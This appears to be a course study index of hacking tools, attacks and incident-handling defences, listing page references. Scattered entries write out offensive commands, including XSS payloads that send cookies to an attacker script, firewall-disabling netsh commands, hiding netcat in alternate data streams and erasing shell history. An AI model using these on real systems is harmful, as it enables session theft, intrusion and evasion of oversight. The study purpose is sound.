Index

Tools and Commands Book/Page Definitions
Tools and Commands BookPage Definition

. (Unix) Unix files with . At the beginning are hiden
-- (SQLi) 4 105 Comment delimiter
; (SQLi) 4 105 query terminator
%d Format string attack
%d, %255d gives a value of 1 or 255
%n %x goesstores
to thethe number
next of characters
available before itself
memory location in a variable.
and dumps Eg:hello%n=5
the content of that memory
%x location.
0x00 3 107 ASCII null character
!exploitable 3 104 Microsoft tool- works with debugger- check crashes
./configure, make, make install 1 237 building linux tools - configure and make
./msfconsole start Metasploit
~/.bash_history 5 86 Shell history
/dev 1 213 stores devices (drives,terminals etc)
/dev/kmem 5 56 kernel code location
/etc/network/intefaces(edit) 1 230 set interface STATIC/DHCP + IP,mask…
stored account info
/etc/passwd 4 36 [login_name] : [encrypted_pass] : [UID_Nr] : [Default_GID] :
[GECOS_Info]:[Home_Dir]:[Login_shell] eg. Smith:*:100:100:Fred
/etc/shadow 1 213
/home 1 213 contain user's home directories
/lib 1 213 contain common libraries
/mnt 1 213 mount
/opt 1 213 optional items, specialized tools
/proc 1 213 virtual file sys to store kerner info
1 213 root login account's home dir
/root
3 86, 129 if compromised, REBUID system
1 264 no logon capability for users from here
/sbin/nologin
4 43
/tmp 1 213 temp data, clear after boot
/usr 1 213 holds user programs & other data
1 213, 266 /var/log/ - logs location
/var
5 85, 89, 101 editing; account entries;
AAD3B43 4 20, 28, 51 encryption padding when using LANMAN
Abel 4 23 Remote cmd shell,remote route table manager,lists tcp&udp
ports,remote passwd dump. Abel in background,dumps info
about:cache 4 132 Your browser cache
utmp:curr logged in users,wtmp:past user logins,btmp:failed
Accounting Entries in Unix 5 98 login,lastlog
observe how server responds to valid/invalid user auth.use scripts like
account harvesting 4 91 wget or perl
Pre:use same error msgs all through,Account lockout.Ide:Frequent
Account Harvesting Defenses 4 96 login attempt
account lockout 4 96 after few bad logon atempts, temp lockout
Achilles edit HTTP Sessions
1 54 Network Perimeter Detection Example
ACK
2 25,82,90,93-95
Ack storms in Session Hijacking sequence numbers gets out of sync due to the hijack (attacker spoof packets) and victim
keeps sending ack msgs
Acknowledgement Number field 5 128 TCP Header - 32 bit
Active Directory 4 5, 25, 33 Remotely stores passwords-server;enforce GP
Active OS fingerprinting sending packets and using behaviour to find OS,passive just listens for packets
# //Secureworks/Confidential - Limited External Distribution Page 1

Active OS fingerprinting defences close ports,use tools:IP personality,portspoof,Osfuscate,blackhole,stealth patch,etc
4 116, 147 free code to re-add the system call table export if removed as is in
ActiveX Redhat 8/later
5 190 Active Browser content
Add N Edit Cookies 4 144 free firfox plugin to modify cookies
47-49, 51-52, How it works; ARP Cache Poisoning; Defenses
Address Resolution Protocol 3 56, 84-85, 93
(ARP)
6 17 NO ARP cache poisoning!could turn into DOS
addsyms free code to re-add the system call table export if removed as is in Redhat 8/later
Adore 5 65 Kernet Rootkit / listens on a port
Advanced Intrusion Detection 1 258
file integrity checker (~TripWire)
Environment (AIDE) 5 67
Aggressive Mode 4 26
VPN and others use IKE, exchange new keys quickly across the network
Airbase-NG 2 68 Started by Easy-Creds -> creates AP
wireless sniffer for cracking WEP keys, need to snif 50-1000mb to
Aircrack-ng 2 64 success
AirDefense 2 75 Identify War Driving
AirMagnet 2 75 Identify War Driving
Airopeek (Omnipeek) 2 64 wireless specific sniffer
Alternate Data Streams in NTFS if file is moved,hidden file is moved along,smbclient can get data from
5 105
Windows ADS,dir /r
Alternate Data Stream .exe type c:\tools\nc.exe > c:\tmp\test.txt:nc.exe, start
Example 5 110
c:\tmp\test.txt(xp),use wimic
Alternate Data Stream Notepad 5 108-109 notepad c:\tmp\test.txt:hidden.txt
Example
Alureon Capabilities creates RC4 encrypted file sys at end pf HDD.config.ini,FileDownload,InjectorAdd
Alureon/TDL Rootkit Family kern-mode,for hiding,dodging AV,alters wind file sys drivers:atapi.sys/iastor.sys
Anti-Reverse Engineering for 5 19 pack exe so that it runs decompresses and then you get the main exec
Execs(wind)
1 53, 119
AntiVirus (AV) 4 170 prevent instalation if DoS
5 9 Can Identify App-Level Trojan Horse Backdoor
1 13, 256
Apache
4 110,124 ModSecurity offers solid filtering features
API Hooking 5 45, 48 Change API calls for running procs to hide
APPEVENT.EVTX 5 114 one of the main Event Logs
APPLICATION.LOG 5 114 on of the primary temp event logs
Application Level Trojan Client-sever archi, Poison Ivy, VNC, Dameware, Sub7, GhostRAT,
5 9-16
Backdoors Blackshades
archive.org 2 39 similar to google Wayback machine
Armitage 3 113 Metasploit GUI inteface
arp -a / arp -a sau -e 3 85 show ARP entries in Win / Linux
ARP-cache-poisoning 4 24 Map IP (network layer) to MAC (Data link layer)
ARP Cache poisoning in session arp spoof both sides(org and dest) then hijack
Hijacking
ARP inspection prevent attackers to assume IP addresses
ARP lab 3 70-77
Arpspoof 3 51-52 manipulate IP to MAC. Feeds false ARP msgs into LAN. Traffic is
pointed to atkr
ARPWatch 3 85 tool to check across the network for sniffing and session hijacking;
Monitors LAN

Aruba Networks 2 75 Wireless IDS monitorint- Iden War driving

how widely spread is affected platform, effect of vuln,value of the sys
Assessment Questions 1 95-96 and data on it,remote expl, public expl available
Assigning Handlers 1 50 ident and assess, events on sys to analyze
attack indicators using event log svc stopped,windows file protection disabled,telnet
1 74
eventvwr.msc invoked,failed logon
Autonomous System Number 3 8 define which IP addresses a router is responsible for
(ASN)
Autoruns.exe utility 1 69 tool for reviewing the Auto Start Entry Points (ASE)
Autopsy (Forensic software) 1 41, 43 Sleuth Kit GUI front end
Avatar (Rootkit for Win) 5 62 2 driver infections.1 to bypass hips,1 for persist.infect random
driver,detect vm
Avoiding SSL Warnings 1 3 65-66 Compromise CA,bleed server keys from memory,bogus cert with MD5
collision
Avoiding SSL Warnings 2 3 67 compromise browser,social engr,mitm ssl strip,install cert on victim
machine
Back Door Factory (BDF) 3 53 incercept EXEs and auto backdoor
Backdoor Alternate names SCSI,UPS,server,client,svchost,initd,init,inet,cron,httpd. Wmic process [pid] delete
(disguise)
keystroke,dialog boxes,lockup/reboot,sys info,create VPN's,Camera &
Backdoor Capabilities 1 5 16 audio capture
Backdoor Capabilities 2 5 Screensaver passwds,dialup passwds,Netwk acc passwds,dump from SAM & mem
Backdoor Capabilities 3 5 File sys control(cp,paste,add/delete,mount..) Process&Registry&Network Control
Backdoor Capabilities 4 5 Multimedia control(video stream,audio capture,camera),Redirect incom TCP/UDP
Backdoors and Trojan Horses 5 6 Some backdoors can also be trojans, looks innocent but is really nasty
Backdoor factory 3 146 backdoor existing executables
Bad Checksum Bypass split atk in 2 halfs with a TCP pkt with badchecksum;resets IDS buffer,3rd pkt passes
1 76, 146
base64 $echo <base64 string> | base64 --decode ;VSAgent communication
5 142-143 python -> base64.b64decode(string)
Low security zone cannot read but can write to high sec zone.high sec
Bell-LaPadula 4 123 read down
Bettercap 3 51, 53, 58-59 Sniffer - manipulate ARP mapping on targt ; DNS spoofer
BeyondTrust 2 119 Vuln scanner
bg 1 227 keep job in background
1st line of def against is to know the baseline of normal traceroute

BGP Hijacking 3 8, 9 information;Contact your ISP if you notice drastic changes in route
Bind shell 3 115 Metasploit Payloads

Binders 5 18 aka Wrappers
BlackShades 5 9 App-lvl Trojan Horse Backdoor Suites
Bloodhound 2 143 maps system relationships,permissions; graphs quickest way to get
domain admin
Blue Coat 1 172 Web-filtering tool
Blue Pill 5 58 VM based rootkit
bmpmap print out the number of near duplicate colors
3 8,9 Allows routersonline to route corectly
Border Gateway Protocol (BGP)
5 192
Bot Communication Channels 4 68 IRC tcp 6667,IRC no std ports,WASTE by AOL,HTTP to a site with
cmds.twitter
Bot Distibution 4 67 via worms,email attachment,application/game .exe,drive by
download,ads

morph code,run sys priv,list shell,add/rm file shares,autostart,vuln

scan other sys
Bot Functionality 4 72-73
Packet floods,http proxy anony surfing,,GRE,email harvest,off
pc,delete bot,kill VM's
Bots - Rise of the Bots 4 66 maintains backdoor control,mail relay,anonymous HTTP proxy,DOS
ncpa.pl then disable all other interfaces except the one you use or
1 8, 202
Bridged network force from VM
6 4, 8-9
147-149, 153-
Bro 1 158 Recovery Monitor tool
Bro logs 1 155, 157 Lab: searching Bro Logs
Browser Exploit Against SSL/TLS TLS1.0, plant JS in browser, generate encrypted msgs based on chosen
3 66
(BEAST) plaintext
Browser Exploitation Framework 76, 79, 81-83, interactive control of browser via an XSS hook.Donzens of
4
(BeEF) 120 modules/functionality
Brute Force Attacks 4 12 trying every possiblepass till success.eg. A,AA,AAA,AAB,ABB etc
btmp (/var/log/btmp) 5 89-90 bad login entries for failed login attempts
create from scratch, off the shelf from exploit-
Buffer Overflow Exploit Sources 3 101 db.com,packetstormsecurity.com etc,
smth very lage place in a box far too small,allows atker to run arbitrary
Buffer Overflow 3 95 functions
Buffer Overflow Defenses Ide:unusual crashes,exec of code from stack,HIPS
3 114
Identification alerts.Contain:deploy non exec stacks.Era:rebuild
Buffer Overflow Defenses Patch sys,HIPS,application whitelisting.Implement non-executable
3 106-107
Preparation system stack
Buffer Overflow Defenses Compile time:canary concept (to protect return pointers);creates hash
3 109
Preparation 2 of the return pointer and checks after func call
Buffer Overflow Defenses 3 110-113 Control Outgoing traffic,hunt teaming
Preparation 3
Buffer Overflow Example in C 3 96 char bufferA[50];char buffer[16];gets(bufferA);strcpy(bufferB, bufferA)
Buffer Overflow exploit best 3 107 make the exploit small enough to fit buffer,avoid terminators like 0x00
practice
Buffer Overflow vulnerable commands: -strcpy -strncpy -strcat -sprintf -scanf -fgets -gets -getws
3 103
commands -memcopy -memmove
Building a Team 1 30
91, 93-95, 104,
Burp Proxy 4 146 find and alter HTTP requests in real time
hash calculator,war driver,sniffer for passwds,win hash dumper,RSA
4 24 token gen…
Cain
Cain has a gui and is used to gather info abt sys.Abel in
4 10, 16-33 background,dumps info
Pre: remove LANMAN hases from local sys; Disable LANMAN
Cain Defences 4 31 challengi/response auth across net(use NTLMv2; Enforce strong pass;
use Pass Policy; Implement SYSKEY; Protect SAM db
cracks Microsoft LANMAN,NT hash (stored in SAM and AD); LM
Cain as password cracker 4 25 challenge/response; NTLMV1&2 challenge/response; Kerberos5 auth
(used for auth across network).
CISCO,APOP-MD5,RIPv2-MD5,OSPF-MD5,VRRP-HMAC-96,VNC 3 DES,
Cain as password cracker 2 4 26 RADIUS,IKE Pre-shared keys,server 2k,Mysql 2k3
record a stations MAC address and it’s corresponding switch port location. Timestamp for
CAM Table (switches) the entry is recorded and it’s VLAN assignment

hash of the return pointer to protect it; creates hash of the return
canary 3 124 pointer and checks after func call; 3 types: random, terminator and
XOR
case insensitive - Windows 4 178 tasklist |find /I /c "notepad.exe"
case insensitive -Linux 4 184 ps aux | grep xeyes
cat (linux) 1 220 cat [OPTION] [FILE]...create single or multiple files.view contain of
file,concatenate files,redirect output in terminal or files
cat /etc/passwd 1 220 see contents of a file (linux)
cat ~/test_file 1 220 see content of a file
Cdoor - Non Promisc Sniffing match pattern of packts to ports,if pakts=proper port,temp listen 5002 with shell
Backdoor
Cdoor - Non Promisc Sniffing
SYN pakts to Ports X,Y and Z,after Z temp listener on 5002, conect with netcat
Backdoor
Certificate Authority (CA) 3 60-61, 65, 84
CGI How it works(same for request to run CGI is in URL requested of server. POST and GET.
PHP,ASP,JSP)
CGI program interface for executeable programs with web pages.
CGI/Web scanner def Same as Vulnerability scanner def + chrooted environment(can only see part of file
don’t delete files till case closed,ctrl access evidence,law enfore to sign
Chain of Custody (Identification) 1 97 for evidence
Check sum hashed tools 2 13 md5sum&sha1sum(Unix),md5summer(Win); md5deep(Win&Unix)-all

hash type
Cheops-ng network maping
Chkrootkit 5 65 analyzes /bin/login to determine if rootkit is installed.
1 261 chmod 4111 /tmp/backdoor (SUID root)
chmod (change permissions) 3 20 chmod 555 listener.sh
5 100 chmod 555 init.conf (Everyone)
clearev (Meterpreter) 5 116 log wiping utility on Win compromised machine
Code Caves 3 146 unused space in an EXE where malware is waiting
Code checking Tools 3 112 RATS,flawfinder,fortify,Coverity,Veracode etc
Code Search Engine Tools koders.com;finds c,c++,java etc caches src code, no regEx
Code Seeker 4 150 App-layer proxy firewall
1 133, 135-136 Def:Setting egress firewall rule at the host's subnet perimeter
Command and Control (C2) 62, 132-133,
5 136-137
web app takes input and process it by invoking shell.Add ; or & to run
Command Injection 4 98 next cmd
Pre:Educate developers,vul assesment.Ide:unusual outb traffic,extra
Command Injection Defenses 4 101 accs,con:fix ap
nslookup or ping Attk IP from input field and sniff on attk machine to
Command Injection examples 4 99-100 see if you get it
Common Backdoors atker takes over sys,install backdoor,can be found via Nmap,fport,TCP view,lsof etc
out of band communications,encrypted voip&emails(PGP)encrypted
Communication Channels 1 52 storage
Compression Ratio Info-leak 3 66 undermines HTTPS by focusing on its compression routines
Made Easy (CRIME)
cone of silence 5 61 inside-visible hidden files;outside-hiden files are hiden to user
Containment 1 98-115 short term, system back up, long term
Containment - Deployment 1 101 Document and secure the incident scene
Containment-Forensic Image 1 110 dd does binary/incremental/bit-by-bit images on Unix/Win
&back-up
Containment-Incident 1 102 FIRST to determine Category,Criticality and Severity
Characterization

patch sys&neighs,IPS,null route,passwd change,alter trustl,FW

Containment-long term 1 113 rules,RM accs&bkdoor
Containment-Notify appropriate 1 104 manager,sec officer, vert & hori reporting, tt system eg CyberSponse
officials
Containment-Risk of continuing 1 112 collect logs from neighbor systems,how far did he get,business call
operation
isolate switchport/vlan,disconnect network access &/power,alter
Containment-Short term 1 107 dns,null route
Counting half open connections 4 189 netstat -nat(t for TCP) | grep -I listen
Linux
Pre:separate log server,crypto integrity check,write once
Covering Tracks Defenses 5 117-118 CD.Ide:Gaps/corrupt logs
Covering Tracks ICMP Tunnel 5 124 carry data inside ICMP packets(ptunnel,loki..)
120, 124, 127- Pre:Keep atks off sys.Ide:know ur processes,NIDS
5 128, 130, 132, Con:Delete atks progm,check other sys.Era:Reimage if atk got
Covert Channel 134, 136-145 root.Rec:monitor
data can be carried in TCP/IP headers;file transfer,cmds for backdoor
6 39 shell etc
Covert_TCP 5 127-131, 134 trans info by entering ASCII in TCP/IP fields:IP ID,TCP init Sqn nr&TCP
Ack Sqn nr
Covert_TCP Bounce Mode Client(SYN)spoofed src_ip of receiver->bounce server(SYN-ACK/RESET)->Rec_Serv
Covert_TCP Modes IP ID:drop ASCII in IP ID field.SQn mode:Drop ASCII in ISN in the 3 way handsh
Covert_TCP Receiver /covert_tcp -dest -source - source_port -dest_port - server - file
CoWPAtty 2 65 sniffs 4 way handshake and lunches crypto attack against PSK
cp hachstuff.exe
5 104 to hide files in a stream behind normal files
notepad.exe:stream1.exe
sets its priority to 16(highest)windows sets all other apps to 15.
CpuHog 4 154 Pre:Patch sys.Ide:single proc at 100%.Con:kill.Era:Remove
prog.Rec:reboot,msconfig
crafted pachet can cause DOS for webserver, formated in a way not expected by dev
create non-root account 1 222 useradd -d [Home_dir] [login] -> useradd -d /home/fred fred
CreateRemoteThread 5 45 Create thread so dll can run:CreateRemoteThread,freeup space
1 253 #crontab -l -u root. Look for cronjobs scheduled by root/UID 0
crontab
5 44 altered to start malw software at startup, hiden
76, 110, 113- BeEF is a XSS Framework and delivers malicious payload; based on
4 126, 128-141, relecting input back to user.bounce code off the server back to
Cross-Site Scripting (XSS) 147, 150 browser
6 59 example
Cross-Site Scripting - admins atk 4 119
browser can be exploited while viewing logs by admin
Cross-site scripting Ide:IDS logs,watch for coded info.Con:Add filter.Era:Remove atk
4 126
Defenses:Ide,con.. data.Rec:anti-fraud
Same as SQL injection.Filter user input and output html.allow only
Cross-site scripting Defenses:Pre 4 124 alpha numeric
Cross-site scripting Defenses:Pre disable scripting(with impact),IE 8 and new chrome has xss
4 125
2 filter,FireFox NoScript
find vuln site,trick usr to click link,code transmitted to vul
Cross-site scripting How it works 4 116-117 site,reflected&ran on brow
Cross-site scripting How to 4 114 url embedded in email or on third party site,message boards
launch
Cross-site scripting Internal Sys
4 119 scan int netwk,from browser exploit home router,Jikto.
Scanning

Cross-site scripting - Log Server

attack browser can be exploited while viewing logs in Splunk
Cross-site scripting Mechanisms 4 123 HTTP(s),Email,FTP,Swipe cards,postal card scanners,magnetic swipes

Cross-site scripting - XSS Shell setup webserver with xss shell,plant hook on vuln site,vict browser compromised
Cross-site scripting - XSS Shell getCookie,alert(<message>),getSelfHtml,eval(<Javascript>),getKeyloggerData
commands
Cross-site scripting Stealing a site.com/search.php?word=<script>document.local='atk_script'+document.cookie;
cookie
Cross-site scripting Stealing a <script>document.location='127.0.0.1:2222/grab.cgi?'+document.cookie</script>
cookie
the malicious script is stored on the target website.If site allows
Cross-site scripting Stored XSS 4 118 posting by 3rd party
Cross-site scripting Url encode the URL to run your malicous code…%46I$6fri$...
Obfuscation
Cryptography Detection has flat histogram,normal document has unpredictable histogram
CUDA 4 10 video drivers; used by Hashcat for faster pass cracking
Cyber crime laws in Canada interception of elctr. Communic(up to 5 yrs). 2.Unath use of computer(up to 10)
Cyber crime laws in Germany data espionage on protected systems(3 yrs or fine).Anti hack law-Cant create tools
Cyber crime laws in Germany(2) unlawfully deletes,alters data(2yrs). Interfers with data processing(5yrs/fine)
Cyber crime laws in Japan all about access breach! 1yr,up to 500k yen fine
Cyber crime laws in Singapore aligned with access control,integrity,confidentiality,avalaibility and auth.$100k,10yrs
Cyber crime laws in the Australia similar to UK.the data must have been stored on a commonwealth computer
Cyber crime laws in the UK intent to secure access to data. The access is unath.He is aware.Fines.up to 5 yrs
Cyber crime laws in the US death,injury to equipment, interception of electronic communication, stored elc info
Cyber crime laws in the US(2) 1.access device,password,credit card etc. 2.unauth access to the computer itself
CyberCPR 1 105 tool to encrypt and hash all data uploaded
CyberSponce 1 104 commercial Incident Response ticket tracking system
Dan Kiminsky Dns Cache Tries inexistent dns entries trying to win the response race,when it does it redirects
Poisoning
marks stack as non-executable,avoidable by adjusting the reg value or
Data Execution Prevention (DEP) 3 123 ROP. Data execution prevention in Win.
1 192 to bypass DLP use USB drive
Data Loss Prevention (DLP) 4 111 DLP tools may detect exfiltrated event for PII(not wen encryp
5 133 Gcat can bypas DLP
1 41, 110, 178 tool for creating a binary image (bit-by-bit)=including deleted and
dd fragmented files
5 22, 25-27, 34
Pre:IDS/IPS,patch,AV,egress filter:drop outgoing pkts with src_add not
DDoS - Defenses 4 170 from netwk
Pre:Redundanc.Ide:flood of pkts,Automated DDOS detection.Con:call
DDoS - Defenses 2 4 171 ISP IH team
Use remote tool/shell to conect to 1 or more sys,use IRC to send cmds
DDos Architecture 4 164 to bots
Ddos Detection and throttling Arbor Networks Peakflow,Riverbed NetProfiler,Neustar
4 171
tools SiteProtect,Cloudflare
Mstram,shaft,Trin00,Tribe Flood Network 2000,Stacheldraht.Nowadays
DDos tools 4 163 only bots
use errorneous/misleading info to detect leak exists. Conf signatures
Deceiving the attacker 1 146 for this data

73,153-
154,163-
Denial of Service (DOS) 4 171,173,175- Bot functionality; DoS attacks and Types
176,181,183
Targa, Xcrush, spike, Toast.
Denial of Service (DOS) Suites 4 161 Exploit:bonk,jolt,land,nestea,newtear,syndrop,teardrp
df 1 257 check available HDD space
2 64 ASLEAP tool-> directory attack agains LEAP authenticaion
Dictionary attack 4 10, 11, 27 Testing all words in a directory or a word file
6 49 C:\> enum -D -u [user] -f [wordfile] [target]
Dig (UNIX- instead of 2 26 dig @[DNS_server_IP][target_domain] -t AXFR
nslookup) 6 29, 47 Zone Transfer attempt: #dig @10.10.10.45 target.tgt -t AXFR
dir command to list file streams but not display or print their content
Add NoLMHash key to registry; LMCompatibilty reg value 3 or 5 (stop
Disable LANMAN Authentication 4 32 sending LANMAN challenge/response across network).
Disaster Recovery (DR) 1 10 Part of Incident-Handeling plan;
Distributed Denial of Service 2 14 Spread using Worm techniques
(DDoS) 4 154, 163 DoS attacks and Types; mostly launched by botnet
Allocate space:VirtualAllocEx,write name&code:WriteProcessMemory
call
DLL Injection 5 45
Create thread so dll can run:CreateRemoteThread,freeup
space:VirtualFreeEx fn
force exe to accept DLL.Hooking:atk undermine running proc
DLL Injection and API Hooking 5 45 interacting windows
DMCA Digital Millennium 2 9 copyright protection and prohibition against reverse engineering
Copyright Act
send small spoofed (60 byte) dns query to many DNS servers,512 bytes
DNS Amplification 4 156-159 to victim. Is dificult to block source because UDP are easy to spot
DNS Cache ipconfig /displaydns

DNS Cache Poisoning - Get the attker queries alice nameServer for any.evil.com,nameserver asks evil.com DNS serv
Query ID
DNS Cache Poisoning - Poison the Evil sends request to bank.com,evil dns server spoofs response before real dns ser
cache
DNS Cache Poisoning Defense 1 Pre:Randomize src ports&query IDs,patch DNS servers and keep them up to date.
DNS Cache Poisoning Defense 2 Pre:Configure split DNS;internal dns server for internal queries, ext for ext queries
DNS Cache Poisoning Defense 3 Pre: Split-Split DNS;outside machine resolves int machines using ext-ext dns server
DNS Cache Poisoning Defense 4 Pre:Use SSL (https),Harden OS,use file integrity checker,IDS/IPS.Digitally sign DNS recs soon!
DNS Cache Poisoning Defense 5 Ide:nslookup,dig,ping.Con:flushdns cache.Erad:upgrade,random src ports,split-split

DNS Foiling 3 56 Run dnsspoof,victim send dns query,sniffed and fake ip given
DNS Overview Client->local nameserver->Root nameServer->org nameServer->sans.org name Server
DNS Query id 16 bit Transaction number
Preparation:Don not allow zone xfer,use split dns.Identification: look
DNS Recon Defense 2 27 TCP 53 traffic
same LAN not necessary, victim send DNS query, sniffed and fake IP
DNS Spoof attack 3 56 given
DNS Spoofing 3 57-60 Remote posibility(between victim & DNS server); Redirecting traffic;
BETTERCAP; redirect graph

Dns to hash lookup tool (ISC) send DNS TXT record with hash in it, reponse with file details.dig +short…."cmd.exe..
DNSCat 3 11 Netcan functionality over DNS
1 146, 148, 154 Lab DNSCat2
DNSCat2
5 132 Tool to use DNS protocol for C2
DNSSEC 3 digitally signed DNS records to prevent spoofing
DNSStuff.com 2 50 Web-based Recon/Attack tool
Domain Name Registration 2 18 Req: Postal add, Phone nr, Name of POC, Authoritative DNS ; Useful
for Social engineering, war dialing, war driving, scanning
Local(process kill,crash,CpuHog)and Network(malformed pakt&packet
Dos attack - Types 4 154 flood)
Drive Duplication 1 111 Hardware tool for bit-by-bit copy
Dshield sensor network 1 15 40k sensors globaly, collecting info on scans & attacks vs ports
2 6 Injects pakets to redirect traffic to it
Dsniff
3 63-64 Active Sniffer
Dsniff Components Dsniff,arpspoof,msgsnarf,DNSSpoof,filesnarf,Webmitm,macof,mailsnarf,sshmitm
67 allows attacker to create evil wireless AP which he has full control over
EASY-CREDS 2
Aircrack-Ng,DMESG holds DHCP logs,SSLStrip,Ettercap and URL Snarf
68 for hijacking
Ebowla 3 146 Environmental Keyed Payloads +Golang language(hard for AV)
Editing Accounting Entries in utmp format,editing
5 90
Unix tool:mary.c,cloak.c,remove,logwedit.c,wtemped.c,wzap.c
/etc/syslog.conf (to see where logs
Editing Log Files Unix 5 85 stored)./var/log/secure,messages.httpd logs
boot into another OS(linux),tool that can edit SAM proves its
Editing logs with physical access 5 115 possible.No release yet
shell is written on exit,therfore Kill -9 [pid],kill -9 bash,unset HISTFILE
Editing Shell History 5 87 then kill -9 $$
editors (linux) 1 219 vi,gnu-emacs,pico,mcedit,nano,gedit eg. (gedit test_file)
Package containing the NOP sled,the attacker machine code and
Egg 3 109 Return Pointer
Elastic search amazon
vulnerability allows u to do arbitrary read of files. Linuxtime 2014/2015 exploited it
Electronic Data Interchange (EDI) 4 123

Possible to do XSS via EDI
get message copy.collect logs from mail relays, FW/IDS logs.Attn to
Email - Gathering evidence 1 167 clock drift
Email-threats/hate speech 1 168 go through email evidence only and let physical sec/fbi handle rest
Emergency Comm plan 1 33 call list,conf bridge,IR contact cards,test ypur process
1 41 Forensic software
EnCase
3 133 Has Parser known flaws;atks can execute cmds or crash apps
Enchanced Mitigation Experiance 3 122 Helps address vulnerabilities in 3rd party software (Microsoft)
Toolkit (EMET)
-S [targetIP]: pulls list of shares, -U:users, -G:groups, -P:password
2 139 policy
Enum
6 16, 33, 49 Detecting users and groups, and password guessing (Win)
enum -D -u [User] -f [wordfile] Directory attack against a target; password guessing for SMB session using a directory
2
[TargetIP] file
SWITCHes:-S: pulls list of shares, -U:users,-G:groups,-P:password
enum -switch [TargetIP] 2 139 policy
enum -u [UserName] -p 2 139 provide an authenticated SMB session to extract info from targe
[password] -G [TargetIP]

Goal:get rid of artifacts,accs,code,software,etc.determine cause and

Eradication (vulnerability analysis) 1 117-121 prevent
scan sys and network,search for vulns,look for exploits and bkdors
apply FW/Router filters, new name/IP, null route, change DNS name,
Eradication-Improving Defenses 1 120 apply Patches.
Eradication-Restoring from Back- reloading the data from backup, adding any lost data and fixing the
1 118
ups vulnerability
3 9, 85 browser; SSH ckient errors- Iden Sniffing & Session hijacking
Error messages
4 91, 96, 104, 106 Checking differences between them for Account Harvesting; looking
for Syntx/Database err msgs to help with SQL injecton
stealing info to subvert the interest of an organization or government
Espionage 1 160-164
Competitive inteligence / legal espionage methods
thumbprint critical files. Search keywords. network IPS/IDS
2 68 session hijaking tool
51, 53, 58-59, active

Ettercap sniff with ARP cache poisoning,hijack sshv1,FTP,Telnet,HTTP etc,
3 passive os fingerprinting, connection killing, character insertion in
64 various protocols.
Observable occurrence in a sys/network.Sys boot sqn,system
Event Definition 1 12 crash,packet flood etc
1 74, 190 cmd read> wevtutil qe security /f:text (for win7↑)
Event Viewer (eventvwr.msc)
3 166 Sysevents -> Metasploit psexec
Event Viewer (eventvwr.msc) 5 114 System.log; Security.log; Application.log; Sysevent.evtx; Secevent.evtx;
Appevent.ectx
eventquery.vbs /L security 1 74, 191 Security event logs (eventquery) XP
Evidence - Best Best possible evidence you can produce under very difficult circumstance.
Evidence - Real and Direct Real=tangible/can be touched(USB,HD,printout). Direct=what you saw(logs,prt_scn)
1 trust.2 difficult to determine/differen from ext hacker. can cause
Evil Insider Lab 1 187 most damage
evt2sys 5 117 tool for Win, reads event logs and FW then to a syslog server
Exe32pack 5 19 packing algorithm / tool
allows you to search an image file for specific file types and character
Expert witness 1 179 strings
Exploitable! 3 104
Tool released by Microsoft that extimates how exploitable a flaw is
explorer.dll (rootkit hooking) 5 48 rootkit injects it in explorer.EXE to do API Hooking
3 168 target to migrate malicious processes
explorer.exe
5 39, 46 process map; it’s a common target of injection;
Extension Mechanisms for DNS locate dns servers that do recursive lookup,respond with 4K byte txt
4 157, 159
(EDNS) Amplification attacks which is cached
Extortion 2 11 DoS extorsion
EyeWitness 2 98 Takes scrnshots of webstes,VNC,RDP servers and all detected
webservers
Fast Flux (botnets) 4 69-71 Attacker swaps between diferent systems to evade detection
Fast Flux Techniques 4 69 Adds extra layer of obscurity; rapidly swapping resources among
different systems to avoid take down
Eg in phishing:Spam
bot emails
Fast Flux Techniques How it Round-robin dns records with 3-10 min TTL populated with
victim,victim clicks
works . proxies.double flux
on link,Round robin
DNS
exponential,spread shape of a gold stick,Warhol 99% in 15mins,Flash
Fast Spreading Worms 4 60 30seconds
fg 1 227-228 bring job in foreground
1 57 System-lever detects fgdump/netcat
Fgdump

Temporarily deactivates AV, dumps passwd hash and reactivates AV;

Fgdump 4 29, 35 give dump to John for pass crack
6 16 Remote SAM pass hash dumper for Windows
fgets 3 96 fgets (bufferA, sizeof(bufferA), stdin) ; >adds bounds checking
Fiddler (proxy tool) 4 146 analyze HTTP req and respons, can alter passing scripts
File Integrity Checking Tool 5 67,118, 155 Tripwire,OSSEC,AIDE
any prog that opens a file,careful: winzip,itunes,wordpad,most
FIle Parser Buffer Overflow 3 133 AV's,Adobe,MS suite
filetype: (ext:) 2 40 Google search, preferably only suffixes
FIN (end of connection bit) 2 93, 95 FIN SCAN:go through firewall with FIN bit packets
check src code for know weak options,use metasploit to scan language
Finding Buffer Overflows 3 103 code(dll,exe)
Finding Buffer Overflows - Cram take a brute force approach,shove repeating pattern to inputs,look for
3 104
input crash
Finding Hidden streams 5 106 Use third party tools like LADS,streams,streams shell extension utility
finding files (linux) 1 218 locate [prog_name], updatedb(if not up to date), find / -name whoami
Firefox webpage script editor and development tool for application

Firebug 4 144 manipulation
Firefox SSL warning msg 3 61 Unrecognized CA error
Firefox (NoScript extension) 4 125 filters websites with scripts;detects suspicious scripting activity
FireWalk send pkts through a pkt filter device to determine which ports are open
Firewalk - how it works works on both stateful & non S Pkt filt devices cos TTL is preserved.Doesn't for proxy
Firewalk - phases Netwk discovery=traceroute to determin nr of hops till pkt filter & Scanning phase
Firewalk Defenses Prep:live with it/disallow ICMP time EX leaving ur netwk/use proxy.Ide:IDS sig.
Firewalk Scanning phases TTL is set to +1 past the firewall, if we receive ICMP time ex,then port is unfiltered
Firewall 101 2 125 Packet filtering, Stateful pkt filtering, Proxy firewall
firewall - disable windows Win 7 1 203 netsh firewall set opmode disable
or less
firewall - disable windows Win 8 1 203 netsh advfirewall set allprofiles state off
or more
sniffs and grabs user's auth session and cookies,give attackr access to
FireSheep 3 68 account HTTP
First in First OUT (FIFO) 3 23-25, 35 mknod backpipe p>created to carry data back and forth on cmd
4 77, 83
FlashUpdate.exe Common infected file/process in the books
5 34, 36-37, 39
Flawfinder (free tool) 3 127 Automated code-checking for C and C++
FL0P - Passive OS finger Printing determines potential attack patterns, analyzes pkt capture for ports like 22,25 etc
used to identify files hosted on sites.everything google search does

FOCA - recon tool 2 41-42 and more
modifies read function in file system hooking.eg.Filters netstat to
Fontanini Rootkit 5 63 remove atk info
1 35, 37, 110, 113 DD,Memoryze(Mandiant) for analyzing memory on windows,volatility

Forensics Images - tools framewrk.both memory and file system.Idealy binary bit by bit image
Format string example - windows sort "%d%d%s%s%n", sort command should crash
Format Srting attacks Defense pre:Use format strings in all printf,sprintf,fprintf and snprintf function calls&patches
Format Srting attacks Defense 2 Ide: Same as buffer overflow
Format String Attacks misuse of printf,sprintf and snprintf,atker can read&overwrite info from mem

